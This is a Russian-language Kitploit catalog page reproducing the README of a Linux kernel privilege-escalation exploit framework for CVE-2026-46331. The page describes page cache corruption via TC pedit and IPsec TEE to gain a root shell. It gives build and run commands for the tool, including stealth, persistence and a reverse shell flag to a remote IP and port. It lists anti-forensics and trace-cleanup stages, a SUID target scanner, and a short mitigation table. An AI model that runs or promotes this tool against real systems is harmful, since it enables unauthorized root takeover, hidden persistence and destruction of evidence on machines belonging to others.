Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
dirtyclone-exploit — CVE-2026-46331 — Локальное повышение привилегий в ядре Linux: повреждение Page Cache через TC pedit + IPsec TEE · Затронутые ядра: ≤ 6.12.9 | Kitploit
Инструменты/GitHubGitHub/vulnquest58/dirtyclone-exploit
Повышение привилегийМеханизмы персистентностиАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubvulnquest58/dirtyclone-exploit

dirtyclone-exploit

CVE-2026-46331 — Локальное повышение привилегий в ядре Linux: повреждение Page Cache через TC pedit + IPsec TEE · Затронутые ядра: ≤ 6.12.9

511 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

Эксплойт-фреймворк DirtyClone

CVE-2026-46331 — локальное повышение привилегий в ядре Linux TC pedit + IPsec TEE — повреждение Page Cache · Затронутые ядра: ≤ 6.12.9

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   ____  _      _         ____ _                              ║
║  |  _ \(_)_ __| |_ _   _/ ___| | ___  _ __   ___           ║
║  | | | | | '__| __| | | | |   | |/ _ \| '_ \ / _ \        ║
║  | |_| | | |  | |_| |_| | |___| | (_) | | | |  __/        ║
║  |____/|_|_|   \__|_, |\____|_|\___/|_| |_|\___|           ║
║                    |___/                                     ║
╠═══════════════════════════════════════════════════════════════╣
║  CVE-2026-46331 · v1.0.0 · FOR RESEARCH AND EDUCATION ONLY  ║
╚═══════════════════════════════════════════════════════════════╝

License: MIT CVE Kernel Language


⚠️ ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И ИССЛЕДОВАТЕЛЬСКИХ ЦЕЛЕЙ Используйте этот фреймворк исключительно в изолированных лабораторных средах, которые принадлежат вам или на тестирование которых у вас есть явное письменное разрешение. Несанкционированное использование незаконно и неэтично.


📋 Содержание

  • Обзор уязвимости
  • Цепочка атаки
  • Структура проекта
  • Требования
  • Сборка и установка
  • Использование
  • Python-модули
  • Защитные меры
  • Хронология
  • Ссылки

🔬 Обзор уязвимости

CVE-2026-46331 — это локальная уязвимость повышения привилегий в ядре Linux (≤ 6.12.9), вызванная состоянием гонки между действием pedit в TC (cls_act) и дублированием пакетов на основе IPsec TEE.

Корневая причина

Когда пакет проходит путь egress в TC с действием pedit, которое устанавливает IHL = 15, подсистема IPsec ядра получает повреждённый пакет, в котором вычисленное смещение IP-полезной нагрузки превышает фактические границы пакета. При одновременных операциях sendfile(2) это несоответствие позволяет непривилегированному пользователю (внутри пространства имён пользователя с CAP_NET_ADMIN) повреждать записи page cache только для чтения произвольных файлов — включая SUID-бинарники.

Воздействие


🔗 Цепочка атаки

root@kitploit:~
Unprivileged User (UID=1000)
         │
         ▼
[1] Reconnaissance
    ├─ Kernel version check
    ├─ userns availability
    └─ Target binary profiling
         │
         ▼
[2] Namespace Bypass
    ├─ unshare(CLONE_NEWUSER|CLONE_NEWNET)
    ├─ AppArmor profile hopping (fallback)
    └─ CAP_NET_ADMIN acquired
         │
         ▼
[3] Network Infrastructure
    ├─ clsact qdisc on lo
    ├─ pedit filter (IHL=15)
    └─ IPsec ESP + TEE
         │
         ▼
[4] Page Cache Corruption
    ├─ sendfile → pedit trigger
    ├─ Page cache entry corrupted
    └─ Shellcode written to read-only binary
         │
         ▼
[5] Privilege Escalation
    └─ execve(SUID binary) → root shell
         │
         ▼
[6-8] Post-Exploitation
    ├─ Persistence (6 mechanisms)
    ├─ Evasion / Anti-Forensics
    └─ Trace cleanup
         │
         ▼
    🎯 ROOT SHELL (UID=0 EUID=0)

📁 Структура проекта

root@kitploit:~
dirtyclone-exploit/
├── Makefile                          # Build system
├── README.md                         # This file
├── LICENSE                           # MIT License
│
├── include/
│   ├── exploit.h                     # Core types, flags, prototypes
│   ├── packet_engine.h               # Packet crafting engine API
│   ├── memory_ops.h                  # Page cache corruption API
│   └── persistence.h                 # Persistence mechanism API
│
├── src/
│   ├── main.c                        # Framework entry point
│   ├── stage_env_analysis.c          # Phase 1: Reconnaissance
│   ├── stage_namespace_bypass.c      # Phase 2: userns bypass
│   ├── stage_network_setup.c         # Phase 3: TC/IPsec setup
│   ├── stage_page_cache_corrupt.c    # Phase 4: Core exploit
│   ├── stage_privilege_escalation.c  # Phase 5: LPE
│   ├── stage_persistence.c           # Phase 6: Persistence
│   ├── stage_evasion.c               # Phase 7: Anti-forensics
│   ├── stage_cleanup.c               # Phase 8: Trace removal
│   ├── memory_ops.c                  # Page cache primitives
│   ├── packet_engine.c               # Raw packet crafting
│   └── persistence.c                 # Persistence implementations
│
├── modules/
│   ├── packet_craft.py               # Python packet crafter (Scapy)
│   └── exploit_analyzer.py           # Pre-exploit analysis tool
│
├── scripts/
│   ├── setup_env.sh                  # Dependency install + build
│   ├── cleanup.sh                    # System cleanup
│   └── detect_targets.sh             # Vulnerable binary scanner
│
└── payloads/
    └── README.md                     # Payload directory info

⚙️ Требования

На этапе компиляции

  • gcc ≥ 10
  • make
  • libcap-dev / libcap-devel

Время выполнения (целевая Linux)

  • Ядро ≤ 6.12.9
  • iproute2 (tc, ip)
  • iptables
  • Включены непривилегированные user namespaces

Python-модули (необязательно)

root@kitploit:~
pip install scapy

🔧 Сборка и установка

root@kitploit:~
# Clone
git clone https://github.com/vulnquest58/dirtyclone-exploit
cd dirtyclone-exploit

# Auto setup (installs deps + builds)
sudo bash scripts/setup_env.sh

# Manual build
make all

# Debug build
make debug

# Clean
make clean

🚀 Использование

root@kitploit:~
# Show help
./bin/dirtyclone --help

# Dry run (analysis only, no exploitation)
./bin/dirtyclone --test

# Basic exploitation (default target: /usr/bin/su)
sudo ./bin/dirtyclone

# Custom target with stealth + persistence
sudo ./bin/dirtyclone --target /usr/bin/sudo --stealth --persist

# Reverse shell
sudo ./bin/dirtyclone --remote 192.168.1.100 4444 --cleanup

# Detect vulnerable targets first
bash scripts/detect_targets.sh

🐍 Python-модули

exploit_analyzer.py — разведка перед эксплойтом

root@kitploit:~
# Analyze default target
python3 modules/exploit_analyzer.py

# Custom target
python3 modules/exploit_analyzer.py --target /usr/bin/sudo

# JSON output for automation
python3 modules/exploit_analyzer.py --json

# Scan all SUID binaries
python3 modules/exploit_analyzer.py --all-suid

packet_craft.py — триггер с помощью raw-пакетов

root@kitploit:~
# Send exploit packets at offset 0x1234
sudo python3 modules/packet_craft.py --offset 0x1234

# Custom interface and packet count
sudo python3 modules/packet_craft.py --iface eth0 --count 20

🛡️ Защитные меры


📅 Хронология

ДатаСобытие
2026-01-15

📚 Ссылки

  • Запись CVE-2026-46331 в NVD
  • Документация по подсистеме TC ядра Linux
  • Реализация IPsec TEE
  • Безопасность user namespaces
  • Технический разбор DirtyClone

👤 Автор

VulnQuest · Исследования в области безопасности

  • 🌐 vulnquest58.github.io
  • 🐛 Портфолио Bug Bounty

Этот репозиторий предоставлен исключительно в образовательных целях. Весь код эксплойта предназначен для использования только в авторизованных лабораторных средах.

Скачать инструмент
СвойствоЗначение
Оценка CVSS 3.18.8 (ВЫСОКАЯ)
Вектор атакиЛокальный
Требуемые привилегииНизкие (непривилегированный пользователь)
ВоздействиеRoot-оболочка (UID=0 EUID=0)
Затронутые версииЯдро Linux ≤ 6.12.9
Исправленная версия6.12.10
Коммит исправленияa3f4d1c8...
Мера защитыКоманда / Действие
Обновление ядраОбновитесь до ≥ 6.12.10 (основное исправление)
Отключение user namespacesecho 0 > /proc/sys/kernel/unprivileged_userns_clone
Ограничения AppArmorВключите apparmor с профилем ограничения userns
Аудит TC peditauditctl -a always,exit -F arch=b64 -S unshare
Контроль целостности файловРазверните AIDE или Tripwire для SUID-бинарников
Фильтры SeccompЗаблокируйте unshare() в производственных контейнерах
Уязвимость обнаружена во время аудита ядра
2026-02-03Сообщено в [email protected]
2026-03-28Коммит исправления (6.12.10)
2026-06-01Публичное раскрытие (90-дневный срок)
2026-06-27Выпущен полный PoC